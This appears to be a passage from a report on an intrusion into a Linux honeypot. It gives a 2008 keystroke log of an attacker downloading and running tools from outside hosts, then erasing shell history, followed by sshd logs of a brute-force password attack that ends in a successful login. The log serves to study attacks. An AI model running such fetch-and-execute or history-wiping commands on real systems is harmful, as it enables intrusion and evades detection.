www.idol.altervista.org/fish.tgz [2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#tar xzvf fish.tgz [2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd a [2008-09-20 23:04:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#chmod +x * [2008-09-20 23:05:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#./x 41.243 22 [2008-09-20 23:05:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd [2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp [2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#s [2008-09-20 23:05:19 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:05:20 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:05:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#rm -rf a [2008-09-20 23:05:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#[U-ARROW][BS]fas[BS][BS]ish.tgz [2008-09-20 23:05:30 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd [2008-09-20 23:05:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp [2008-09-20 23:06:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz [2008-09-20 23:06:57 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd [2008-09-20 23:06:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:07:00 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w [2008-09-20 23:07:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd va/rmtp [2008-09-20 23:07:04 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:07:08 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd v[BS]/tmp [2008-09-20 23:07:09 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz [2008-09-20 23:07:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget members.lycos.co.uk/carbalano/bido.jpg [2008-09-20 23:07:52 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#curl [2008-09-20 23:07:58 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w [2008-09-20 23:07:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd [2008-09-20 23:08:14 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w [2008-09-20 23:08:17 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp [2008-09-20 23:08:18 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls [2008-09-20 23:08:32 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz [2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd [2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls [2008-09-20 23:10:30 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w [2008-09-20 23:12:45 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp [2008-09-20 23:12:46 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls [2008-09-20 23:12:53 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#tar zxvf fast.tar.gz [2008-09-20 23:12:55 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd fast [2008-09-20 23:12:57 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#chmod +x * [2008-09-20 23:13:00 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#./linux [2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd [2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls [2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w 55 [2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTFILE [2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset BASHFILE [2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTSAVE [2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#history -n [2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset WATCH [2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#export HISTFILE=/dev/null [2008-09-20 23:13:09 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#rm -rf .bash_history [2008-09-21 02:23:12 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77360 COM:bash ]#Documents [2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Do [2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:23:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd .. [2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77371 COM:bash ]#Pictures [2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Pic [2008-09-21 02:23:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:23:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd .. [2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77379 COM:bash ]#/tmp [2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd /t [2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77387 COM:bash ]#fast [2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fas [2008-09-21 02:23:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:23:43 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd .. [2008-09-21 02:23:49 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#w [2008-09-21 02:25:18 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:25:20 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fast [2008-09-21 02:25:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:25:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd r [2008-09-21 02:25:27 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:25:33 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77464 COM:bash ]#rinsult.e [2008-09-21 02:25:34 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat rawa[BS][BS][BS]in [2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd .. [2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:25:45 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls -l [2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech3.users [2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech1.users [2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech2.users [2008-09-21 02:25:58 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77493 COM:bash ]#mech1.users [2008-09-21 02:25:59 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat me1 [2008-09-21 02:26:05 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[U-ARROW][L-ARROW][L-ARROW][LARROW][L-ARROW][LARROW][L-ARROW][L-ARROW][BS]2 [2008-09-21 02:26:13 Host:130.195.4.20 UID:1001 PID:1281079 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77507 COM:bash ]#linux [2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat li [2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[ESC][?1;2c[ESC][?1;2c[ESC][?1;2c [2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]# [2008-09-21 02:26:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls [2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77519 COM:bash ]#m.pid [2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.p [2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.ses [2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.set [2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77536 COM:bash ]#m.ses [2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.ses [2008-09-21 02:27:23 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#e[BS]w [2008-09-21 02:27:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#exit SSH Logs Sep 21 10:51:55 paul-desktop sshd[8838]: Failed password for invalid user t1na from 82.99.173.209 port 60061 ssh2 Sep 21 10:51:58 paul-desktop sshd[8840]: Failed password for invalid user alexis from 82.99.173.209 port 60193 ssh2 Sep 21 10:52:00 paul-desktop sshd[8842]: Failed password for invalid user t1na from 82.99.173.209 port 60291 ssh2 Sep 21 10:52:00 paul-desktop sshd[8844]: Failed password for invalid user a from 82.99.173.209 port 60360 ssh2 Sep 21 10:52:02 paul-desktop sshd[8846]: Failed password for invalid user art from 82.99.173.209 port 60489 ssh2 Sep 21 10:52:04 paul-desktop sshd[8848]: Failed password for invalid user slim from 82.99.173.209 port 60587 ssh2 Sep 21 10:52:04 paul-desktop sshd[8850]: Failed password for invalid user logic from 82.99.173.209 port 60675 ssh2 Sep 21 10:52:05 paul-desktop sshd[8852]: Failed password for invalid user b from 82.99.173.209 port 60709 ssh2 Sep 21 10:52:07 paul-desktop sshd[8854]: Failed password for invalid user shortcut from 82.99.173.209 port 60838 ssh2 Sep 21 10:52:07 paul-desktop sshd[8855]: Failed password for invalid user desiree from 82.99.173.209 port 60912 ssh2 Sep 21 10:52:08 paul-desktop sshd[8858]: Failed password for invalid user eminem from 82.99.173.209 port 60986 ssh2 Sep 21 10:52:08 paul-desktop sshd[8860]: Failed password for invalid user diablo from 82.99.173.209 port 32783 ssh2 56 Sep 21 10:52:10 paul-desktop sshd[8862]: Failed password for invalid user haitac from 82.99.173.209 port 32886 ssh2 (...) Sep 21 10:52:48 paul-desktop sshd[9016]: Failed password for invalid user maria from 82.99.173.209 port 38176 ssh2 Sep 21 10:52:49 paul-desktop sshd[9020]: Failed password for invalid user natasha from 82.99.173.209 port 38439 ssh2 Sep 21 10:52:50 paul-desktop sshd[9028]: Failed password for invalid user skywalker from 82.99.173.209 port 38688 ssh2 Sep 21 10:52:50 paul-desktop sshd[9022]: Failed password for invalid user conter from 82.99.173.209 port 38607 ssh2 Sep 21 10:52:50 paul-desktop sshd[9023]: Failed password for invalid user ha from 82.99.173.209 port 38608 ssh2 Sep 21 10:52:50 paul-desktop sshd[9024]: Failed password for invalid user claudius from 82.99.173.209 port 38613 ssg2 Sep 21 10:52:51 paul-desktop sshd[9030]: Failed password for invalid user maria from 82.99.173.209 port 38732 ssh2 Sep 21 10:52:52 paul-desktop sshd[9031]: Failed password for invalid user maryjane from 82.99.173.209 port 38767 ssh2 Sep 21 10:52:52 paul-desktop sshd[9033]: Failed password for invalid user putty from 82.99.173.209 port 38796 ssh2 Sep 21 10:52:52 paul-desktop sshd[9036]: Accepted password for john from 82.99.173.209 port 1372 ssh2 57